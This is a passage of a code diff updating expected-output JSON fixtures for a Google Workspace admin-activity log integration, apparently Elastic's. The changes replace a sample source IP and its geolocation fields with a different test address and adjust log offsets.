+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1145,26 +1061,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9100,
+        "log.offset": 9079,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1185,7 +1097,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1198,26 +1110,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9526,
+        "log.offset": 9504,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1239,7 +1147,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1253,26 +1161,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9946,
+        "log.offset": 9923,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1294,7 +1198,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1309,26 +1213,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10401,
+        "log.offset": 10377,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1349,7 +1249,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1363,26 +1263,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10917,
+        "log.offset": 10892,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1404,7 +1300,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1418,26 +1314,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11381,
+        "log.offset": 11355,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1459,7 +1351,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1472,26 +1364,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11843,
+        "log.offset": 11816,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1512,7 +1400,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -1524,26 +1412,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12264,
+        "log.offset": 12236,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1565,7 +1449,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1578,26 +1462,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12657,
+        "log.offset": 12628,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1618,7 +1498,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1630,26 +1510,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13078,
+        "log.offset": 13048,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1670,7 +1546,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1684,26 +1560,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13458,
+        "log.offset": 13427,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1725,7 +1597,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1739,26 +1611,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13919,
+        "log.offset": 13887,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
